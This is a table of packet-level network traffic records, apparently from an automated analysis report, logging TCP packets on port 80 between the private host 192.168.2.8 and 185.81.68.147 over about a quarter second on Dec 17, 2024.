                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.300940990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.301064014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.301791906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.301830053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.301949024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.302663088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.302726984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.302896976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.303637028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.303742886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.303844929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.304614067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.304734945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.304816008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.305876017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.306005955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.306139946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.306727886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.306776047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.306909084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.307492018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.307583094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.307660103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.308377981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.308490992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.308634043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.309340954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.309458017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.309751034 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.310286999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.310525894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.310741901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.311240911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.311425924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.311543941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.312150955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.312266111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.312355995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.313134909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.313235998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.313323975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.314096928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.314203024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.314281940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.315007925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.315090895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.315335989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.315990925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.316077948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.316256046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.316934109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.317032099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.317130089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.317902088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.318010092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.318085909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.318823099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.318873882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.319230080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.319794893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.319869041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.319956064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.320718050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.321106911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.321122885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.321163893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.322104931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.322171926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.322175026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.323033094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.323079109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.323127985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.323937893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.323990107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.324040890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.324903011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.325006962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.325071096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.325838089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.325975895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.325989962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.326801062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.326841116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.326913118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.327796936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.327886105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.327905893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.328720093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.328774929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.328871965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.329674959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.329721928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.329777956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.330745935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.330843925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.330863953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.331630945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.331671000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.331747055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.332545996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.332607985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.332636118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.333664894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.333739042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.333758116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.334510088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.334583044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.334590912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.335458994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.335525036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.335541010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.336322069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.336424112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.336447954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.337290049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.337358952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.337373018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.338241100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.338265896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.338285923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.339445114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.339503050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.339567900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.394855022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.482532024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.482666969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.482867002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.482981920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.483078957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.483197927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.484170914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.484324932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.484420061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.485105991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.485172033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.485282898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.485970974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.486115932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.486303091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.486816883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.486906052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.487149954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.487760067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.487951994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.488061905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.488712072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.488818884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.488922119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.489675999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.489865065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.489979029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.490613937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.490717888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.490819931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.491559029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.491668940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.491763115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.492506981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.492597103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.492739916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.493473053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.493591070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.493769884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.494402885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.494561911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.494764090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.495443106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.495600939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.495929956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.496342897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.496436119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.496548891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.497319937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.497399092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.497490883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.498361111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.498558998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.498816967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.499238014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.499352932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.499480009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.500180960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.500257969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.500335932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.501075029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.501171112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.501247883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.501997948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.502089024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.502197027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.502996922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.503132105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.503211021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.503937006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.504043102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.504153967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.504905939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.504976034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.505069017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.505832911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.505964994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.506315947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.506756067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.506831884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.506936073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.507735014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.507898092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.508033037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.508668900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.508779049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.508872032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.509655952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.509741068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.509866953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.510585070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.510698080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.510792971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.511629105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.511687994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.511780977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.512512922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.512609005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.512723923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.513463974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.513618946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.513736010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.514378071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.514482975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.514611959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.515378952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.515491009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.515769005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.516261101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.516391039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.517246008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.517329931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.517350912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.517831087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.518183947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.518315077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.518418074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.519123077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.519238949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.519321918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.520131111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.520267963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.520391941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.521050930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.521147966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.521274090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.521996975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.522114992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.522289038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.523047924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.523207903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.523338079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.523910999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.524064064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.524879932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.525002003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.525023937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.525288105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.525923014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.525990963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.526077032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.526758909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.526940107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.527070045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.527753115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.527825117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.527920961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.528675079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.528795004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.528985977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.529609919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.529962063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.530576944 CET8049709185.81.68.147192.168.2.8
